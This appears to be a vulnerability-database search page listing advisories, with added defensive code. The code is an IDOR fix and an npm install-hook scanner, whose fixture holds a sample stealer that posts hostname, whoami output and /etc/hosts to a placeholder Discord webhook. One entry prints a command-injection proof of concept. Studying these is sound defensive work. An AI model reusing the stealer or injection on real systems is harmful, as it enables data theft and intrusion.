Lucene search

19 matches found

Cvelist | added 2026/05/28 4:25 p.m. | 30 views

CVE-2026-41141 EspoCRM: IDOR in EmailTemplate Prepare Endpoint Leaks Entity Data via Email Address Lookup

EspoCRM is an open source customer relationship management application. Prior to 9.3.5, the POST /api/v1/EmailTemplate/:id/prepare endpoint accepts an emailAddress parameter and resolves the owning entity (Contact, Lead, Account, or User) without performing an ACL check. An authenticated user with...

CVSS 6.5 | EPSS 0.00346
Exploits: 0 | References: 1
CVE | added 2026/05/28 4:25 p.m. | 19 views

CVE-2026-41141

EspoCRM prior to 9.3.5 is vulnerable via POST /api/v1/EmailTemplate/:id/prepare: supplying an emailAddress lets an authenticated user with EmailTemplate read permission resolve the owning entity (Contact/Lead/Account/User) without ACL checks, leaking all field values and bypassing read: own/...

CVSS 6.5 | AI score 5.8 | EPSS 0.00346
Exploits: 0 | References: 1
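The gap the two CVE-2026-41141 entries above describe is an authorization check applied to the wrong object: the caller's right to read the email template is verified, but the entity that the email address resolves to is returned whole without asking whether the caller may read it. The following is an added illustration written for this listing, not EspoCRM's code; the in-memory records, the `acl` object, the "read: own" rule modelled as ownership by `assignedUserId`, and the function names are all assumptions. It shows the vulnerable shape beside the hardened one, where the ACL is applied to the resolved entity and an unreadable record is reported exactly like a missing one.

```javascript
// Constructed sample data: records of two entity types owned by different users.
const entities = [
  { id: 'c1', type: 'Contact', emailAddress: 'alice@example.com',
    assignedUserId: 'u1', phone: '+1-555-0100', notes: 'VIP, renewal in Q3' },
  { id: 'c2', type: 'Contact', emailAddress: 'bob@example.com',
    assignedUserId: 'u2', phone: '+1-555-0200', notes: 'disputed invoice' },
  { id: 'l1', type: 'Lead', emailAddress: 'carol@example.com',
    assignedUserId: 'u1', phone: '+1-555-0300', notes: 'inbound from webinar' },
];

// Assumed minimal ACL: any user with the EmailTemplate:read permission may use
// the prepare endpoint; entity records are readable only by their assigned
// user ("read: own") unless the caller is an admin.
const acl = {
  canReadTemplate: (user) => user.permissions.includes('EmailTemplate:read'),
  canReadEntity: (user, entity) => user.isAdmin || entity.assignedUserId === user.id,
};

// Email-address lookup across all entity types, as the advisory describes.
function findByEmail(emailAddress) {
  return entities.find((e) => e.emailAddress === emailAddress) || null;
}

// Vulnerable shape: only the template permission is checked, so whichever
// record the address resolves to is returned with every field.
function prepareVulnerable(user, emailAddress) {
  if (!acl.canReadTemplate(user)) throw new Error('403 Forbidden');
  const entity = findByEmail(emailAddress);
  return entity ? { ...entity } : null;
}

// Hardened shape: the ACL is applied to the entity that was resolved. Because
// "not readable" and "not found" give the same response, the endpoint cannot
// be used to confirm which addresses exist in the CRM either.
function prepareHardened(user, emailAddress) {
  if (!acl.canReadTemplate(user)) throw new Error('403 Forbidden');
  const entity = findByEmail(emailAddress);
  if (!entity || !acl.canReadEntity(user, entity)) return null;
  return { ...entity };
}

// A low-privilege user who holds only the template permission.
const lowPriv = { id: 'u2', isAdmin: false, permissions: ['EmailTemplate:read'] };
const noTemplate = { id: 'u3', isAdmin: false, permissions: [] };
```

With `lowPriv`, `prepareVulnerable` hands back Alice's notes and phone number even though that contact belongs to `u1`; `prepareHardened` returns `null` for her, returns Bob's own record, and still rejects a caller without the template permission. The point generalizes beyond email addresses: any "resolve X from user-supplied Y" step needs the read check on X, not only on the endpoint that performs the resolution.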
CNNVD | added 2026/05/08 12:00 a.m. | 9 views

IP cross-site scripting vulnerability

IP is an open-source IP address query and display tool developed by th30d4y. Versions of IP from 1.0.1 to 2.0.1 contained a cross-site scripting vulnerability. The vulnerability stemmed from insufficient sanitization of user input, which could lead to DOM-based cross-site scripting attacks...

CVSS 6.1 | AI score 5.6 | EPSS 0.00181
Exploits: 0 | References: 1
OSSF Malicious Packages | added 2026/04/24 1:35 a.m. | 10 views

Malicious code in amplitude-ma-ts (npm)

npm stealer. Hardcoded Discord webhook id 1497047226428690432 in postinstall Folder/bin/S.js. Exfiltrates hostname, whoami, pwd, public IP (api.ipify.org) and /etc/hosts via a Discord embed. v1.0.21 was an empty placeholder; v1.0.22 shipped the payload (name-squat-then-poison). Typosquats the @amplitude/analytics scope...

AI score 5.8
Exploits: 0
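The entry above describes the shape rather than the code, and the shape is what a registry-side or CI scanner can key on: an install-time lifecycle hook that runs a script which gathers host identity and posts it to a webhook. The following scanner is an added example written for this listing; it is not the OSSF entry's tooling and not the package's code. The package.json and the hook script it inspects are constructed to mirror the description (the webhook id in them is a placeholder, not the one from the advisory), and the indicator list and the `block`/`review`/`allow` verdict rule are assumptions about what a reviewer would want flagged.

```javascript
// Constructed sample package: a postinstall hook that runs a script which
// collects host identity and ships it to a webhook. The file contents are
// made up for this example; the webhook id is a placeholder.
const SAMPLE_PACKAGE = {
  packageJson: {
    name: 'example-ma-ts', version: '1.0.22',
    scripts: { postinstall: 'node bin/S.js', test: 'jest' },
  },
  files: {
    'bin/S.js': [
      "const os = require('os');",
      "const { execSync } = require('child_process');",
      "const hook = 'https://discord.com/api/webhooks/0000000000000000000/placeholder';",
      "const data = { host: os.hostname(), user: execSync('whoami').toString(),",
      "  cwd: process.cwd(), hosts: require('fs').readFileSync('/etc/hosts', 'utf8') };",
      "fetch('https://api.ipify.org').then(r => r.text()).then(ip => {",
      "  fetch(hook, { method: 'POST', body: JSON.stringify({ embeds: [{ ...data, ip }] }) });",
      "});",
    ].join('\n'),
  },
};

// Hooks npm runs automatically on install; 'prepare' also runs on git installs.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators (assumed list) that, combined, distinguish an exfil beacon from
// a build step that merely shells out.
const INDICATORS = [
  { id: 'discord-webhook', re: /discord(?:app)?\.com\/api\/webhooks\//i },
  { id: 'public-ip-lookup', re: /api\.ipify\.org|ifconfig\.me|icanhazip\.com/i },
  { id: 'reads-etc-hosts', re: /\/etc\/hosts/ },
  { id: 'host-identity', re: /os\.hostname\(\)|\bwhoami\b|os\.userInfo\(\)/ },
  { id: 'outbound-post', re: /\.post\(|method:\s*['"]POST['"]/i },
];

// Walks every lifecycle hook, records it, resolves "node <file>" to the
// script it runs, and tests that script's source against the indicators.
function scanPackage(pkg) {
  const findings = [];
  const scripts = pkg.packageJson.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    findings.push({ kind: 'lifecycle-hook', hook, cmd });
    const m = cmd.match(/\bnode\s+([^\s&;|]+)/);
    const src = m ? pkg.files[m[1]] : undefined;
    if (!src) continue;
    for (const ind of INDICATORS) {
      if (ind.re.test(src)) findings.push({ kind: 'indicator', hook, file: m[1], id: ind.id });
    }
  }
  return findings;
}

// Verdict rule (assumed): collection plus an outbound channel is a block;
// any install hook at all deserves a look; otherwise allow.
function verdict(findings) {
  const ids = new Set(findings.filter((f) => f.kind === 'indicator').map((f) => f.id));
  const exfil = ids.has('discord-webhook') || ids.has('outbound-post');
  const collects = ids.has('host-identity') || ids.has('reads-etc-hosts') || ids.has('public-ip-lookup');
  if (exfil && collects) return 'block';
  return findings.length ? 'review' : 'allow';
}
```

Run against `SAMPLE_PACKAGE` the scanner reports the postinstall hook plus every indicator and returns `block`; a package whose only hook is `node-gyp rebuild` yields `review`, since the hook is real but nothing resolvable was inspected; a package with no install hooks yields `allow`. The placeholder-then-payload pattern in the entry (v1.0.21 empty, v1.0.22 armed) is the reason to rescan on every new version rather than once per package name.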
OSV | added 2025/09/15 2:15 p.m. | 5 views

UBUNTU-CVE-2022-50240

In the Linux kernel, the following vulnerability has been resolved: android: binder: stop saving a pointer to the VMA. Do not record a pointer to a VMA outside of the mmap_lock for later use. This is unsafe, and there are a number of failure paths after which the recorded VMA pointer may be freed during...

CVSS 7.8 | AI score 5.8 | EPSS 0.00153
Exploits: 0 | References: 4
Gitee | added 2025/09/13 5:02 a.m. | 98 views

peda

This repository is an offensive tool for exploit development: PEDA (Python Exploit Development Assistance for GDB), a script that helps speed up the exploit development process on Linux/Unix. The tool is designed to work with GDB 7.x and Python 2.6+. The tool has various features,...

AI score 6.8
Exploits: 0
OSV | added 2023/09/12 10:15 p.m. | 4 views

DEBIAN-CVE-2023-4813

A flaw has been identified in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with...

CVSS 5.9 | AI score 6.1 | EPSS 0.01669
Exploits: 0 | References: 1
SUSE CVE | added 2023/02/15 3:57 a.m. | 1 view

SUSE CVE-2020-14354

A possible use-after-free and double-free in the c-ares library version 1.16.0 if ares_destroy is called before ares_getaddrinfo completes. This flaw possibly allows an attacker to crash the service that uses the c-ares library. The highest threat from this vulnerability is to the service's availability...

CVSS 3.3 | AI score 7 | EPSS 0.00529
Exploits: 1 | References: 3
OSSF Malicious Packages | added 2023/02/06 12:29 a.m. | 4 views

Malicious code in fc-address-lookup (npm)

Per-source details (source: ghsa-malware 5feb9e0be7037fdbecf7bb66bc86bef489c699497fb662d27506efc7f03889ca): Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

AI score 6.9
Exploits: 0 | References: 1
OSV | added 2023/02/06 12:29 a.m. | 6 views

MAL-2023-330 Malicious code in fc-address-lookup (npm)

Per-source details (source: ghsa-malware 5feb9e0be7037fdbecf7bb66bc86bef489c699497fb662d27506efc7f03889ca): Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

AI score 7
Exploits: 0 | References: 1
Citrix | added 2022/07/06 12:00 a.m. | 7 views

CWA for Android: We were unable to tunnel through the proxy

The viewer of CWA for Android fails to establish a connection to the VDA with the error message "We were unable to connect through the proxy. Error - 0". Logs show the following error: 02-10 05:44:55.989 1117 28821 W System.err: Caused by: android.system.GaiException: android_getaddrinfo failed: EAI_NODA...

AI score 7
Exploits: 0
OSV | added 2021/07/31 11:03 a.m. | 4 views

OESA-2021-1291 nodejs security update

Node.js is a platform built on Chrome's JavaScript runtime for easily building fast, scalable network applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, perfect for data-intensive real-time applications that run across distributed devices...

CVSS 5.3 | AI score 6.6 | EPSS 0.23132
Exploits: 1 | References: 2
Snyk | added 2020/12/04 5:35 p.m. | 4 views

Command Injection

Overview: macfromip is a module that gets a MAC address from a LAN IP address. Affected versions of this package are vulnerable to Command Injection. The injection points are located in lines 66 and 96 in macfromip.js.

PoC: var a = require("macfromip"); a.getMacInLinux("& touch JHU", function...

CVSS 9.8 | AI score 7.2 | EPSS 0.02046
Exploits: 1 | References: 2
Openbugbounty | added 2017/11/01 4:13 p.m. | 12 views

ip-address-lookup-v4.com XSS vulnerability

Open Bug Bounty ID: OBB-385141

Description | Value
---|---
Affected Website: | ip-address-lookup-v4.com
Vulnerable Application: | Custom Code
Vulnerability Type: | XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score: | 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
Remediation Guide: | OWASP XSS Preventio...

AI score 6.3
Exploits: 0
Tenable Nessus | added 2015/01/08 12:00 a.m. | 45 views

CentOS 6 : glibc (CESA-2015:0016)

Updated glibc packages that fix two security issues and two bugs are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are...

CVSS 5 | AI score 8.2 | EPSS 0.06564
Exploits: 1 | References: 3
OSV | added 2013/07/21 8:18 p.m. | 4 views

MGASA-2013-0228 Updated squid packages fix security vulnerabilities

Due to incorrect data validation, Squid is vulnerable to a buffer overflow attack when processing specially crafted HTTP requests. This problem allows any trusted client or client script that can generate HTTP requests to trigger a buffer overflow in Squid, resulting in a termination of the Squid...

CVSS 7.5 | AI score 8.8 | EPSS 0.80451
Exploits: 0 | References: 6
NVD | added 2007/03/06 1:19 a.m. | 18 views

CVE-2006-7122

Cross-site scripting (XSS) vulnerability in the IP Address Lookup functionality in the BSQ Sitestats component for Joomla 1.8.0, and possibly other versions before 2.2.1, allows remote attackers to inject arbitrary web script and HTML via the ip parameter...

CVSS 6.8 | AI score 5.9 | EPSS 0.01182
Exploits: 0 | References: 5
CVE | added 2007/03/06 1:00 a.m. | 51 views

CVE-2006-7122

CVE-2006-7122 is a cross-site scripting (XSS) issue in the IP Address Lookup of BSQ Sitestats for Joomla. Affects 1.8.0 and possibly earlier versions; vulnerable parameter: ip. Exploitation could inject arbitrary script/HTML. Remediation: upgrade to a version containing the fix (2.2.1) or apply t...

CVSS 6.8 | AI score 6.1 | EPSS 0.01182
Exploits: 0 | References: 5 | Affected Software: 1
Cvelist | added 2007/03/06 1:00 a.m. | 24 views

CVE-2006-7122

Cross-site scripting (XSS) vulnerability in the IP Address Lookup functionality in the BSQ Sitestats component for Joomla 1.8.0, and possibly other versions before 2.2.1, allows remote attackers to inject arbitrary web script and HTML via the ip parameter...

AI score 5.9 | EPSS 0.01182
Exploits: 0 | References: 5